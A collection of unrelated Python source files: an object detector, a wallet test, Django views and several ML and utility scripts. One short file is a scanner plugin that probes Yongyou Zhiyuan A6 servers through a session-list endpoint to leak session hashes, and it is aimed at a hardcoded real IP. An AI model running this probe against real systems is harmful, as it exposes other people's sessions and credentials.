raise TypeError("Variance anonymization only works with variable fields.")
elif not len(args) == 1:
raise TypeError("A numeric variance must be given in your anonymity mapping.")
elif not isinstance(args[0], (float, int)):
# if field is int, float or Decimal
raise TypeError(
"You must supply a float or integer variance for numeric fields."
)
# if a date or datetime, vary by some deviation of days
if isinstance(v, (date, datetime)):
return v + timedelta(days=random.gauss(0, args[0]))
return type(v)(random.gauss(float(v), args[0]))
STRAT_TO_FUNC = {
Strategies.SUPPRESS: suppress,
Strategies.PARTIAL_SUPPRESS: partial_suppress,
Strategies.MOCK: mock,
Strategies.VARY: vary,
}
|
import cv2
import json
import sys
import numpy as np
from os import path
# CNTK imports
from cntk import load_model
from cntk import placeholder
from cntk.logging.graph import find_by_name, get_node_outputs
from cntk.ops import combine
from cntk.ops.sequence import input_variable
from cntk.ops.functions import CloneMethod
# constants used for ROI generation:
# ROI generation
roi_minDimRel = 0.04
roi_maxDimRel = 0.4
roi_minNrPixelsRel = 2 * roi_minDimRel * roi_minDimRel
roi_maxNrPixelsRel = 0.33 * roi_maxDimRel * roi_maxDimRel
roi_maxAspectRatio = 4.0 # maximum aspect Ratio of a ROI vertically and horizontally
roi_maxImgDim = 200 # image size used for ROI generation
ss_scale = 100 # selective search ROIS: parameter controlling cluster size for segmentation
ss_sigma = 1.2 # selective search ROIs: width of gaussian kernal for segmentation
ss_minSize = 20 # selective search ROIs: minimum component size for segmentation
grid_nrScales = 7 # uniform grid ROIs: number of iterations from largest possible ROI to smaller ROIs
grid_aspectRatios = [1.0, 2.0, 0.5] # uniform grid ROIs: aspect ratio of ROIs
roi_minDim = roi_minDimRel * roi_maxImgDim
roi_maxDim = roi_maxDimRel * roi_maxImgDim
roi_minNrPixels = roi_minNrPixelsRel * roi_maxImgDim * roi_maxImgDim
roi_maxNrPixels = roi_maxNrPixelsRel * roi_maxImgDim * roi_maxImgDim
nms_threshold = 0.1
def get_classes_description(model_file_path, classes_count):
model_dir = path.dirname(model_file_path)
classes_names = {}
model_desc_file_path = path.join(model_dir, 'model.json')
if not path.exists(model_desc_file_path):
# use default parameter names:
for i in range(classes_count):
classes_names["class_%d"%i] = i
return classes_names
with open(model_desc_file_path) as handle:
file_content = handle.read()
model_desc = json.loads(file_content)
return model_desc["classes"]
class FRCNNDetector:
def __init__(self, model_path,
pad_value = 114, cntk_scripts_path=r"c:\local\cntk\Examples\Image\Detection\FastRCNN",
use_selective_search_rois = True,
use_grid_rois = True):
self.__model_path = model_path
self.__cntk_scripts_path = cntk_scripts_path
self.__pad_value = pad_value
self.__pad_value_rgb = [pad_value, pad_value, pad_value]
self.__use_selective_search_rois = use_selective_search_rois
self.__use_grid_rois = use_grid_rois
self.__model = None
self.__is_python_model = False
self.__model_warm = False
self.__grid_rois_cache = {}
self.labels_count = 0
# a cache to use ROIs after filter in case we only use the grid method
self.__rois_only_grid_cache = {}
sys.path.append(self.__cntk_scripts_path)
global imArrayWidthHeight, getSelectiveSearchRois, imresizeMaxDim
from cntk_helpers import imArrayWidthHeight, getSelectiveSearchRois, imresizeMaxDim
global getGridRois, filterRois, roiTransformPadScaleParams, roiTransformPadScale
from cntk_helpers import getGridRois, filterRois, roiTransformPadScaleParams, roiTransformPadScale
global softmax2D, applyNonMaximaSuppression
from cntk_helpers import softmax2D, applyNonMaximaSuppression
def ensure_model_is_loaded(self):
if not self.__model:
self.load_model()
def warm_up(self):
self.ensure_model_is_loaded()
if self.__model_warm:
return
# a dummy variable for labels the will be given as an input to the network but will be ignored
dummy_labels = np.zeros((self.__nr_rois, self.labels_count))
dummy_rois = np.zeros((self.__nr_rois, 4))
dummy_image = np.ones((3, self.__resize_width, self.__resize_height)) * 255.0
# prepare the arguments
arguments = {
self.__model.arguments[self.__args_indices["features"]]: [dummy_image],
self.__model.arguments[self.__args_indices["rois"]]: [dummy_rois]
}
self.__model.eval(arguments)
self.__model_warm = True
def load_model(self):
if self.__model:
raise Exception("Model already loaded")
trained_frcnn_model = load_model(self.__model_path)
self.__is_python_model = True if (len(trained_frcnn_model.arguments) < 3) else False
if (self.__is_python_model):
self.__args_indices = {"features" : 0, "rois" : 1}
self.__nr_rois = trained_frcnn_model.arguments[self.__args_indices["rois"]].shape[0]
self.__resize_width = trained_frcnn_model.arguments[self.__args_indices["features"]].shape[1]
self.__resize_height = trained_frcnn_model.arguments[self.__args_indices["features"]].shape[2]
self.labels_count = trained_frcnn_model.arguments[self.__args_indices["rois"]].shape[1]
self.__model = trained_frcnn_model
else:
# cache indices of the model arguments
args_indices = {}
for i,arg in enumerate(trained_frcnn_model.arguments):
args_indices[arg.name] = i
self.__nr_rois = trained_frcnn_model.arguments[args_indices["rois"]].shape[0]
self.__resize_width = trained_frcnn_model.arguments[args_indices["features"]].shape[1]
self.__resize_height = trained_frcnn_model.arguments[args_indices["features"]].shape[2]
self.labels_count = trained_frcnn_model.arguments[args_indices["roiLabels"]].shape[1]
# next, we adjust the clone the model and create input nodes just for the features (image) and ROIs
# This will make sure that only the calculations that are needed for evaluating images are performed
# during test time
#
# find the original features and rois input nodes
features_node = find_by_name(trained_frcnn_model, "features")
rois_node = find_by_name(trained_frcnn_model, "rois")
# find the output "z" node
z_node = find_by_name(trained_frcnn_model, 'z')
# define new input nodes for the features (image) and rois
image_input = input_variable(features_node.shape, name='features')
roi_input = input_variable(rois_node.shape, name='rois')
# Clone the desired layers with fixed weights and place holder for the new input nodes
cloned_nodes = combine([z_node.owner]).clone(
CloneMethod.freeze,
{features_node: placeholder(name='features'), rois_node: placeholder(name='rois')})
# apply the cloned nodes to the input nodes to obtain the model for evaluation
self.__model = cloned_nodes(image_input, roi_input)
# cache the indices of the input nodes
self.__args_indices = {}
for i,arg in enumerate(self.__model.arguments):
self.__args_indices[arg.name] = i
def resize_and_pad(self, img):
self.ensure_model_is_loaded()
# port of the c++ code from CNTK: https://github.com/Microsoft/CNTK/blob/f686879b654285d06d75c69ee266e9d4b7b87bc4/Source/Readers/ImageReader/ImageTransformers.cpp#L316
img_width = len(img[0])
img_height = len(img)
scale_w = img_width > img_height
target_w = self.__resize_width
target_h = self.__resize_height
if scale_w:
target_h = int(np.round(img_height * float(self.__resize_width) / float(img_width)))
else:
target_w = int(np.round(img_width * float(self.__resize_height) / float(img_height)))
resized = cv2.resize(img, (target_w, target_h), 0, 0, interpolation=cv2.INTER_NEAREST)
top = int(max(0, np.round((self.__resize_height - target_h) / 2)))
left = int(max(0, np.round((self.__resize_width - target_w) / 2)))
bottom = self.__resize_height - top - target_h
right = self.__resize_width - left - target_w
resized_with_pad = cv2.copyMakeBorder(resized, top, bottom, left, right,
cv2.BORDER_CONSTANT, value=self.__pad_value_rgb)
# tranpose(2,0,1) converts the image to the HWC format which CNTK accepts
model_arg_rep = np.ascontiguousarray(np.array(resized_with_pad, dtype=np.float32).transpose(2, 0, 1))
return resized_with_pad, model_arg_rep
def get_rois_for_image(self, img):
self.ensure_model_is_loaded()
# get rois
if self.__use_selective_search_rois:
rects, scaled_img, scale = getSelectiveSearchRois(img, ss_scale, ss_sigma, ss_minSize,
roi_maxImgDim) # interpolation=cv2.INTER_AREA
else:
rects = []
scaled_img, scale = imresizeMaxDim(img, roi_maxImgDim, boUpscale=True, interpolation=cv2.INTER_AREA)
imgWidth, imgHeight = imArrayWidthHeight(scaled_img)
if not self.__use_selective_search_rois:
if (imgWidth, imgHeight) in self.__rois_only_grid_cache:
return self.__rois_only_grid_cache[(imgWidth, imgHeight)]
# add grid rois
if self.__use_grid_rois:
if (imgWidth, imgHeight) in self.__grid_rois_cache:
rectsGrid = self.__grid_rois_cache[(imgWidth, imgHeight)]
else:
rectsGrid = getGridRois(imgWidth, imgHeight, grid_nrScales, grid_aspectRatios)
self.__grid_rois_cache[(imgWidth, imgHeight)] = rectsGrid
rects += rectsGrid
# run filter
rois = filterRois(rects, imgWidth, imgHeight, roi_minNrPixels, roi_maxNrPixels, roi_minDim, roi_maxDim,
roi_maxAspectRatio)
if len(rois) == 0: # make sure at least one roi returned per image
rois = [[5, 5, imgWidth - 5, imgHeight - 5]]
# scale up to original size and save to disk
# note: each rectangle is in original image format with [x,y,x2,y2]
original_rois = np.int32(np.array(rois) / scale)
img_width = len(img[0])
img_height = len(img)
# all rois need to be scaled + padded to cntk input image size
targetw, targeth, w_offset, h_offset, scale = roiTransformPadScaleParams(img_width, img_height,
self.__resize_width,
self.__resize_height)
rois = []
for original_roi in original_rois:
x, y, x2, y2 = roiTransformPadScale(original_roi, w_offset, h_offset, scale)
xrel = float(x) / (1.0 * targetw)
yrel = float(y) / (1.0 * targeth)
wrel = float(x2 - x) / (1.0 * targetw)
hrel = float(y2 - y) / (1.0 * targeth)
rois.append([xrel, yrel, wrel, hrel])
# pad rois if needed:
if len(rois) < self.__nr_rois:
rois += [[0, 0, 0, 0]] * (self.__nr_rois - len(rois))
elif len(rois) > self.__nr_rois:
rois = rois[:self.__nr_rois]
if not self.__use_selective_search_rois:
self.__rois_only_grid_cache[(imgWidth, imgHeight)] = (np.array(rois), original_rois)
return np.array(rois), original_rois
def detect(self, img):
self.ensure_model_is_loaded()
self.warm_up()
resized_img, img_model_arg = self.resize_and_pad(img)
test_rois, original_rois = self.get_rois_for_image(img)
roi_padding_index = len(original_rois)
# a dummy variable for labels the will be given as an input to the network but will be ignored
dummy_labels = np.zeros((self.__nr_rois, self.labels_count))
# prepare the arguments
arguments = {
self.__model.arguments[self.__args_indices["features"]]: [img_model_arg],
self.__model.arguments[self.__args_indices["rois"]]: [test_rois]
}
# run it through the model
output = self.__model.eval(arguments)
self.__model_warm = True
# take just the relevant part and cast to float64 to prevent overflow when doing softmax
if (self.__is_python_model):
rois_values = output[0][:roi_padding_index].astype(np.float64)
else:
rois_values = output[0][0][:roi_padding_index].astype(np.float64)
# get the prediction for each roi by taking the index with the maximal value in each row
rois_labels_predictions = np.argmax(rois_values, axis=1)
# calculate the probabilities using softmax
rois_probs = softmax2D(rois_values)
non_padded_rois = test_rois[:roi_padding_index]
max_probs = np.amax(rois_probs, axis=1).tolist()
rois_prediction_indices = applyNonMaximaSuppression(nms_threshold, rois_labels_predictions, max_probs,
non_padded_rois)
original_rois_predictions = original_rois[rois_prediction_indices]
rois_predictions_labels = rois_labels_predictions[rois_prediction_indices]
# filter out backgrond label
non_background_indices = rois_predictions_labels > 0
rois_predictions_labels = rois_predictions_labels[non_background_indices]
rois_predictions = original_rois_predictions[non_background_indices]
return rois_predictions, rois_predictions_labels
if __name__ == "__main__":
import argparse
import os
parser = argparse.ArgumentParser(description='FRCNN Detector')
parser.add_argument('--input', type=str, metavar='<path>',
help='Path to image file or to a directory containing image in jpg format', required=True)
parser.add_argument('--output', type=str, metavar='<directory path>',
help='Path to output directory', required=False)
parser.add_argument('--model', type=str, metavar='<file path>',
help='Path to model file',
required=True)
parser.add_argument('--cntk-path', type=str, metavar='<dir path>',
help='Path to the directory in which CNTK is installed, e.g. c:\\local\\cntk',
required=False)
parser.add_argument('--json-output', type=str, metavar='<file path>',
help='Path to output JSON file', required=False)
args = parser.parse_args()
input_path = args.input
output_path = args.output
json_output_path = args.json_output
model_file_path = args.model
if args.cntk_path:
cntk_path = args.cntk_path
else:
cntk_path = "C:\\local\\cntk"
cntk_scripts_path = path.join(cntk_path, r"Examples/Image/Detection/FastRCNN")
if (output_path is None and json_output_path is None):
parser.error("No directory output path or json output path specified")
if (output_path is not None) and not os.path.exists(output_path):
os.makedirs(output_path)
if os.path.isdir(input_path):
import glob
file_paths = glob.glob(os.path.join(input_path, '*.jpg'))
else:
file_paths = [input_path]
detector = FRCNNDetector(model_file_path, use_selective_search_rois=False,
cntk_scripts_path=cntk_scripts_path)
detector.load_model()
if json_output_path is not None:
model_classes = get_classes_description(model_file_path, detector.labels_count)
json_output_obj = {"classes": model_classes,
"frames" : {}}
colors = [(0,0,0), (255,0,0), (0,0,255)]
players_label = -1
print("Number of images to process: %d"%len(file_paths))
for file_path, counter in zip(file_paths, range(len(file_paths))):
print("Read file in path:", file_path)
img = cv2.imread(file_path)
rects, labels = detector.detect(img)
print("Processed image %d"%(counter+1))
if output_path is not None:
img_cpy = img.copy()
print("Running FRCNN detection on", file_path)
print("%d regions were detected"%len(rects))
for rect, label in zip(rects, labels):
x1, y1, x2, y2 = rect
cv2.rectangle(img_cpy, (x1, y1), (x2, y2), (0, 255, 0), 2)
output_file_path = os.path.join(output_path, os.path.basename(file_path))
cv2.imwrite(output_file_path, img_cpy)
elif json_output_path is not None:
image_base_name = path.basename(file_path)
regions_list = []
json_output_obj["frames"][image_base_name] = {"regions": regions_list}
for rect, label in zip(rects, labels):
regions_list.append({
"x1" : int(rect[0]),
"y1" : int(rect[1]),
"x2" : int(rect[2]),
"y2" : int(rect[3]),
"class" : int(label)
})
if json_output_path is not None:
with open(json_output_path, "wt") as handle:
json_dump = json.dumps(json_output_obj, indent=2)
handle.write(json_dump)
|
import json, logging, pytest, time, os
from cryptoadvance.specter.specter import Specter
from cryptoadvance.specter.managers.wallet_manager import WalletManager
from cryptoadvance.specter.wallet import Wallet
from conftest import instantiate_bitcoind_controller
logger = logging.getLogger(__name__)
def test_check_utxo_and_amounts(
specter_regtest_configured: Specter, funded_hot_wallet_1: Wallet
):
wl = funded_hot_wallet_1
# Let's first prepare some locked txids
unspent_list_orig = wl.rpc.listunspent() # to be able to ref in stable way
wl.check_utxo()
# 10 transactions + 2 unconfirmed
assert len(wl.full_utxo) == 12
# none are locked
assert len([tx for tx in wl.full_utxo if tx["locked"]]) == 0
# Freeze 2 UTXO
# ["txid:vout", "txid:vout"]
wl.toggle_freeze_utxo(
[
f"{unspent_list_orig[0]['txid']}:{unspent_list_orig[0]['vout']}",
f"{unspent_list_orig[1]['txid']}:{unspent_list_orig[1]['vout']}",
]
)
# still 12 utxo with 2 unconfirmed
wl.check_utxo()
assert len(wl.full_utxo) == 12
# 2 are locked
assert len([tx for tx in wl.full_utxo if tx["locked"]]) == 2
# Check total amount
assert wl.amount_total == 15
# Check confirmed amount
assert wl.amount_confirmed == 10
# Check unconfirmed amount
assert wl.amount_unconfirmed == 5
# Check frozen amount
assert wl.amount_frozen == 2
# Check available amount
assert wl.amount_available == 13 # total - frozen
# Check immature amount
address = wl.getnewaddress()
wl.rpc.generatetoaddress(1, address)
wl.update_balance()
assert (
round(wl.amount_immature, 1) == 50
or round(wl.amount_immature, 1) == 25
or round(wl.amount_immature, 1) == 12.5
or round(wl.amount_immature, 2) == 6.25
)
# amount_locked_unsigned is tested in test_wallet_createpsbt (in test_managers_wallet.py)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
# 用友致远A6协同系统账号密码泄露
import re
def assign(service, arg):
if service == 'yongyou_zhiyuan_a6':
return True, arg
def audit(arg):
reg = re.compile(r'[a-fA-F0-9]{32,32}')
payload = "yyoa/ext/https/getSessionList.jsp?cmd=getAll"
code,_,res,_,_ = curl.curl2(arg+payload)
m = reg.findall(res)
if m and code == 200:
security_warning(arg+payload)
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_zhiyuan_a6','http://222.175.187.147:8081/')[1]) |
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.db.models import QuerySet
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from rest_framework import status
from cuisines.models import Cuisine
from cuisines.serializers import CuisineSerializer
from drf_yasg.utils import swagger_auto_schema
from drf_yasg import openapi
from rest_framework.views import APIView
class JSONResponse(HttpResponse):
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
class CuisineListView(APIView):
@csrf_exempt
@swagger_auto_schema(
operation_description="Gets a list of Cuisine objects.",
responses={
200: CuisineSerializer(many=True)
},
tags=['Cuisine'],
)
def get(self, request, *args, **kwargs):
objects: QuerySet[Cuisine] = Cuisine.objects.all()
serializer = CuisineSerializer(objects, many=True)
return JSONResponse(serializer.data)
@csrf_exempt
@swagger_auto_schema(
operation_description="Creates a new Cuisine entry with a given name",
# query_serializer=CuisineSerializer,
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=['name'],
properties={
'name': openapi.Schema(
description='The cuisines unique name.',
type=openapi.TYPE_STRING
)
},
),
responses={
200: CuisineSerializer(many=False),
400: """
The required request parameters are not met.
""",
},
tags=['Cuisine'],
)
def post(self, request):
data = JSONParser().parse(request)
serializer = CuisineSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JSONResponse(
serializer.data,
status=status.HTTP_201_CREATED
)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
class CuisineDetailView(APIView):
@csrf_exempt
@swagger_auto_schema(
operation_description="Gets a Cuisine object for a given id.",
responses={
200: CuisineSerializer(many=False),
404: """
The object could not be retrieved, since it doesn't exist.
""",
},
tags=['Cuisine'],
)
def get(self, request, pk):
try:
data = Cuisine.objects.get(pk=pk)
except Cuisine.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
serializer = CuisineSerializer(data)
return JSONResponse(serializer.data)
@csrf_exempt
@swagger_auto_schema(
operation_description="Updates a Cuisine object with a given id.",
# query_serializer=CuisineSerializer,
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=['name'],
properties={
'name': openapi.Schema(
description='The cuisines unique name.',
type=openapi.TYPE_STRING
)
},
),
responses={
200: CuisineSerializer(many=False),
400: """
The required request parameters are not met.
""",
404: """
The object could not be updated, since it doesn't exist.
""",
},
tags=['Cuisine'],
)
def put(self, request, pk):
try:
data = Cuisine.objects.get(pk=pk)
except Cuisine.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
parsed_data = JSONParser().parse(request)
serializer = CuisineSerializer(
data,
data=parsed_data
)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
@csrf_exempt
@swagger_auto_schema(
operation_description="Updates a Cuisine object with a given id.",
# query_serializer=CuisineSerializer,
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=[],
properties={
'name': openapi.Schema(
description='The cuisines unique name.',
type=openapi.TYPE_STRING
)
},
),
responses={
200: CuisineSerializer(many=False),
400: """
The required request parameters are not met.
""",
404: """
The object could not be updated, since it doesn't exist.
""",
},
tags=['Cuisine'],
)
def patch(self, request, pk):
try:
data = Cuisine.objects.get(pk=pk)
except Cuisine.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
parsed_data = JSONParser().parse(request)
serializer = CuisineSerializer(
data,
data=parsed_data,
partial=True
)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
@csrf_exempt
@swagger_auto_schema(
operation_description="Deletes a Cuisine object with a given id.",
responses={
203: None,
404: """
The object could not be deleted, since it doesn't exist.
""",
},
tags=['Cuisine'],
)
def delete(self, request, pk):
try:
data = Cuisine.objects.get(pk=pk)
except Cuisine.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
data.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
|
from django.shortcuts import render, HttpResponse, redirect
from url.models import shorturl
def urlshort(request, query=None):
if not query or query is None:
return render(request, 'url/home.html')
else:
try:
check = shorturl.objects.get(short_query=query)
check.visits = check.visits + 1
check.save()
url_to_redirect = check.original_url
return redirect(url_to_redirect)
except shorturl.DoesNotExist:
return render(request, 'url/home.html', {'error': "error"}) |
"""
The Forum Post Code
"""
import requests
from scratchlink import Exceptions
_website = "scratch.mit.edu"
_api = f"api.{_website}"
class Forum:
def __init__(self, id):
self.headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36"
}
self.f_id = str(id)
self.update_data()
def update_data(self):
"""
Update the data
"""
try:
data = requests.get(f"https://scratchdb.lefty.one/v3/forum/topic/info/{self.f_id}",
headers=self.headers).json()
except KeyError:
raise Exceptions.InvalidForumTopic(f"Forum with ID - '{self.f_id}' doesn't exist!")
self.f_title = data['title']
self.f_category = data['category']
self.f_is_closed = data['closed'] == 1
self.f_is_deleted = data['deleted'] == 1
self.f_time = data['time']
self.f_post_count = data["post_count"]
def id(self):
"""
Returns the id of the forum
"""
return self.f_id
def title(self):
"""
Returns the title of the forum
"""
return self.f_title
def category(self):
"""
Returns the category of the forum
"""
return self.f_category
def is_closed(self):
"""
Returns whether the forum is closed or not
"""
return self.f_is_closed
def is_deleted(self):
"""
Returns whether the forum is deleted or not
"""
return self.f_is_deleted
def time(self):
"""
Returns the activity of the forum
"""
return self.f_time
def post_count(self):
"""
Returns the total post count of the forum
"""
return self.f_post_count
def posts(self, page=1):
"""
Get the post in Forum Topic of a specified page. Images and some other stuff will not appear!
:param page: The page
"""
return requests.get(f"https://scratch-forum.sid72020123.repl.co/forum/?topic={self.f_id}&page={page}",
headers=self.headers).json()
def _all_data(self):
"""
DON'T USE THIS
"""
data = {
'Forum ID': self.id(),
'Title': self.title(),
'Category': self.category(),
'Is Closed?': self.is_closed(),
'Is Deleted?': self.is_deleted(),
'Post Count': self.post_count()
}
return data
def pretty_print_topic_data(self):
"""
Pretty Print the Forum Topic Data
"""
data = self._all_data()
length = self._find_max_length(data) + 10
print("\033[1;33;40m" + "-" * length)
print("\033[1;35;40m" + "Data of Forum with ID", str(self.f_id) + ":")
for i in data:
print("\t\033[1;32;40m" + i + ":", "\033[1;34;40m" + str(data[i]).replace("\n", " "))
print("\033[1;33;40m" + "-" * length)
print("\033[0m")
def _find_max_length(self, d):
"""
DON'T USE THIS
"""
length = 0
for i in d.values():
if len(str(i)) > length:
length = len(str(i))
return length
|
from utils import read_file
from intcode import Intcode, Task
print("#--- part1 ---#")
program = list(map(int, read_file('09.txt')[0].split(',')))
vm = Intcode()
vm.run(Task('part1', program, [1], ramsize=4096))
print(vm.tasks[0].outputs[0])
print("#--- part2 ---#")
program = list(map(int, read_file('09.txt')[0].split(',')))
vm = Intcode()
vm.run(Task('part2', program, [2], ramsize=4096))
print(vm.tasks[0].outputs[0])
|
from .component import *
from .context import *
from .event import *
from .runner import *
from .utils import *
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, New Indictrans Technologies pvt.ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.utils import nowdate
from frappe.utils.user import UserPermissions
from frappe import *
import frappe
from frappe import _
from frappe.model.document import Document
class InvalidLeaveApproverError(frappe.ValidationError): pass
class BookBill(Document):
def validate(self):
ls=[]
ls.append(self.payments)
# print "#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@",ls
def on_submit(self):
#print"############################################",not self.balance_amount!=0,self.balance_amount
if self.balance_amount>0:
frappe.throw(_("Only Balance Amount with 0 can be submitted"))
# else :
# return True |
#!/usr/bin/env python
import os
import sys
import cv2
import numpy as np
import tensorflow as tf
import tensorflow_addons as tfa
from ravens.models import ResNet43_8s
from ravens import utils
class Attention:
"""Daniel: attention model implemented as an hourglass FCN.
Used for the picking network, and for placing if doing the 'no-transport'
ablation. By default our TransporterAgent class (using this for picking)
has num_rotations=1, leaving rotations to the Transport component. Input
shape is (320,160,6) with 3 height maps, and then we change it so the H
and W are both 320 (to support rotations).
In the normal Transporter model, this component only uses one rotation,
so the label is just sized at (320,160,1).
"""
def __init__(self, input_shape, num_rotations, preprocess):
self.num_rotations = num_rotations
self.preprocess = preprocess
max_dim = np.max(input_shape[:2])
self.padding = np.zeros((3, 2), dtype=int)
pad = (max_dim - np.array(input_shape[:2])) / 2
self.padding[:2] = pad.reshape(2, 1)
input_shape = np.array(input_shape)
input_shape += np.sum(self.padding, axis=1)
input_shape = tuple(input_shape)
# Initialize fully convolutional Residual Network with 43 layers and
# 8-stride (3 2x2 max pools and 3 2x bilinear upsampling)
d_in, d_out = ResNet43_8s(input_shape, 1)
self.model = tf.keras.models.Model(inputs=[d_in], outputs=[d_out])
self.optim = tf.keras.optimizers.Adam(learning_rate=1e-4)
self.metric = tf.keras.metrics.Mean(name='attention_loss')
def forward(self, in_img, apply_softmax=True):
"""Forward pass.
in_img.shape: (320, 160, 6)
input_data.shape: (320, 320, 6), then (None, 320, 320, 6)
"""
input_data = np.pad(in_img, self.padding, mode='constant')
input_data = self.preprocess(input_data)
input_shape = (1,) + input_data.shape
input_data = input_data.reshape(input_shape)
in_tens = tf.convert_to_tensor(input_data, dtype=tf.float32)
# Rotate input
pivot = np.array(input_data.shape[1:3]) / 2
rvecs = self.get_se2(self.num_rotations, pivot)
in_tens = tf.repeat(in_tens, repeats=self.num_rotations, axis=0)
# https://www.tensorflow.org/addons/api_docs/python/tfa/image/transform
in_tens = tfa.image.transform(in_tens, rvecs, interpolation='NEAREST')
# Forward pass
in_tens = tf.split(in_tens, self.num_rotations)
logits = ()
for x in in_tens:
logits += (self.model(x),)
logits = tf.concat(logits, axis=0)
# Rotate back output
rvecs = self.get_se2(self.num_rotations, pivot, reverse=True)
logits = tfa.image.transform(logits, rvecs, interpolation='NEAREST')
c0 = self.padding[:2, 0]
c1 = c0 + in_img.shape[:2]
logits = logits[:, c0[0]:c1[0], c0[1]:c1[1], :]
logits = tf.transpose(logits, [3, 1, 2, 0])
output = tf.reshape(logits, (1, np.prod(logits.shape)))
if apply_softmax:
output = np.float32(output).reshape(logits.shape[1:])
return output
def train(self, in_img, p, theta):
self.metric.reset_states()
with tf.GradientTape() as tape:
output = self.forward(in_img, apply_softmax=False)
# Compute label
theta_i = theta / (2 * np.pi / self.num_rotations)
theta_i = np.int32(np.round(theta_i)) % self.num_rotations
label_size = in_img.shape[:2] + (self.num_rotations,)
label = np.zeros(label_size)
label[p[0], p[1], theta_i] = 1
label = label.reshape(1, np.prod(label.shape))
label = tf.convert_to_tensor(label, dtype=tf.float32)
# Compute loss
loss = tf.nn.softmax_cross_entropy_with_logits(label, output)
loss = tf.reduce_mean(loss)
# Backpropagate
grad = tape.gradient(loss, self.model.trainable_variables)
self.optim.apply_gradients(
zip(grad, self.model.trainable_variables))
self.metric(loss)
return np.float32(loss)
def load(self, path):
self.model.load_weights(path)
def save(self, filename):
self.model.save(filename)
def get_se2(self, num_rotations, pivot, reverse=False):
'''
Get SE2 rotations discretized into num_rotations angles counter-clockwise.
Returns list (np.array) where each item is a flattened SE2 rotation matrix.
'''
rvecs = []
for i in range(num_rotations):
theta = i * 2 * np.pi / num_rotations
theta = -theta if reverse else theta
rmat = utils.get_image_transform(theta, (0, 0), pivot)
rvec = rmat.reshape(-1)[:-1]
rvecs.append(rvec)
return np.array(rvecs, dtype=np.float32)
def get_attention_heatmap(self, attention):
"""Given attention, get a human-readable heatmap.
https://docs.opencv.org/master/d3/d50/group__imgproc__colormap.html
In my normal usage, the attention is already softmax-ed but just be
aware in case it's not. Also be aware of RGB vs BGR mode. We should
ensure we're in BGR mode before saving. Also with RAINBOW mode, red =
hottest (highest attention values), green=medium, blue=lowest.
Note: to see the grayscale only (which may be easier to interpret,
actually...) save `vis_attention` just before applying the colormap.
"""
# Options: cv2.COLORMAP_PLASMA, cv2.COLORMAP_JET, etc.
#attention = tf.reshape(attention, (1, np.prod(attention.shape)))
#attention = tf.nn.softmax(attention)
vis_attention = np.float32(attention).reshape((320, 160))
vis_attention = vis_attention - np.min(vis_attention)
vis_attention = 255 * vis_attention / np.max(vis_attention)
vis_attention = cv2.applyColorMap(np.uint8(vis_attention), cv2.COLORMAP_RAINBOW)
vis_attention = cv2.cvtColor(vis_attention, cv2.COLOR_RGB2BGR)
return vis_attention |
# -*- coding: utf-8 -*-
from . import account_move
from . import payment_acquirer
from . import payment_icon
from . import payment_transaction
|
import startup
import os
import numpy as np
import imageio
import scipy.io
#import tensorflow as tf
#import tensorflow.contrib.slim as slim
import torch
from torch.utils.tensorboard import SummaryWriter
import pdb
from util.common import parse_lines
from util.app_config import config as app_config
from util.system import setup_environment
from util.simple_dataset import Dataset3D
from util.fs import mkdir_if_missing
from util.camera import get_full_camera, quaternion_from_campos
from util.visualise import vis_pc, merge_grid, mask4vis
from util.point_cloud_to import pointcloud2voxels3d_fast, pointcloud_project_fast
#pointcloud2voxels, smoothen_voxels3d, pointcloud2voxels3d_fast, pointcloud_project_fast
from util.quaternion import as_rotation_matrix, quaternion_rotate
from models import model_pc_to as model_pc
from run.ShapeRecords import ShapeRecords
import pickle
def build_model(model, input, global_step):
cfg = model.cfg()
batch_size = cfg.batch_size
device = 'cuda' if torch.cuda.is_available() else 'cpu'
code = 'images' if cfg.predict_pose else 'images_1'
for k in input.keys():
try:
input[k] = torch.from_numpy(input[k]).to(device)
except AttributeError:
pass
with torch.no_grad():
outputs = model(input, global_step, is_training=False, run_projection=False)
cam_transform = outputs['poses'] if cfg.predict_pose else None
outputs["inputs"] = input[code]
outputs["camera_extr_src"] = input['matrices']
outputs["cam_quaternion"] = input['camera_quaternion']
outputs["cam_transform"] = cam_transform
return outputs
def model_student(inputs, model):
cfg = model.cfg()
outputs = model.model_predict(inputs, is_training=False,
predict_for_all=False)
points = outputs["points_1"]
camera_pose = outputs["pose_student"]
rgb = None
transl = outputs["predicted_translation"] if cfg.predict_translation else None
#proj_out = pointcloud_project_fast(model.cfg(), points, camera_pose, transl, rgb, None)
#proj_out = pointcloud_project_fast(model.cfg(), points, camera_pose, transl, rgb, model.gauss_kernel())
#proj = proj_out["proj_depth"]
return camera_pose
def model_unrotate_points(cfg):
"""
un_q = quat_gt^(-1) * predicted_quat
pc_unrot = un_q * pc_np * un_q^(-1)
"""
from util.quaternion import quaternion_normalise, quaternion_conjugate, \
quaternion_rotate, quaternion_multiply
